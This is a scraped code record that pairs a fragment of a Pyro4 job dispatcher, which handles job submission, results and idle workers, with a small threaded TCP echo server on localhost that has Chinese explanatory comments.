worker.proxy.start_computation(self, job.id, **job.kwargs)
job.worker_name = wn
self.running_jobs[job.id] = job
self.logger.debug('DISPATCHER: job %s dispatched on %s' %
(str(job.id), worker.name))
def submit_job(self, id, **kwargs):
self.logger.debug('DISPATCHER: trying to submit job %s' % str(id))
with self.runner_cond:
job = Job(id, **kwargs)
job.time_it('submitted')
self.waiting_jobs.put(job)
self.logger.debug(
'DISPATCHER: trying to notify the job_runner thread.')
self.runner_cond.notify()
@Pyro4.expose
@Pyro4.callback
@Pyro4.oneway
def register_result(self, id=None, result=None):
self.logger.debug('DISPATCHER: job %s finished' % (str(id)))
with self.runner_cond:
self.logger.debug('DISPATCHER: register_result: lock acquired')
# fill in missing information
job = self.running_jobs[id]
job.time_it('finished')
job.result = result['result']
job.exception = result['exception']
self.logger.debug('DISPATCHER: job %s on %s finished' %
(str(job.id), job.worker_name))
self.logger.debug(str(job))
# delete job
del self.running_jobs[id]
# label worker as idle again
try:
self.worker_pool[job.worker_name].runs_job = None
self.worker_pool[job.worker_name].proxy._pyroRelease()
self.idle_workers.add(job.worker_name)
# notify the job_runner to check for more jobs to run
self.runner_cond.notify()
except KeyError:
# happens for crashed workers, but we can just continue
pass
except:
raise
# call users callback function to register the result
# needs to be with the condition released, as the master can call
# submit_job quickly enough to cause a dead-lock
self.new_result_callback(job)
|
c4.py
|
"""
服务端
服务器进程要先绑定一个端口监听其他客户端的请求连接
如果请求过来了,服务器与其建立连接,进行通信
服务器一般使用固定端口(80)监听
为了区分socket连接是和哪个客户端进程般的,所以需要4个参数去区分:
1. 服务器地址 2. 客户端地址 3. 服务端端口 4 客户端端口
"""
import socket
import threading
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 绑定地址
s.bind(('127.0.0.1', 8000))
# 进行监听
s.listen(5) # 等待连接的最大数量
print('connecting...')
# 接受客户端的连接
def process_tcp(sock, addr):
print('new connection from %s:%s' % (addr))
sock.send(b'welcome my home')
while True:
# 处理请求
data = sock.recv(1024)
time.sleep(1)
if not data:
break
sock.send(b'hello %s' % data)
sock.close()
print('conection from %s:%s closed' % addr)
while True:
# 接受新连接
sock, addr = s.accept()
# 创建新的线程来处理TCP连接
t = threading.Thread(target=process_tcp, args=(sock, addr))
t.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.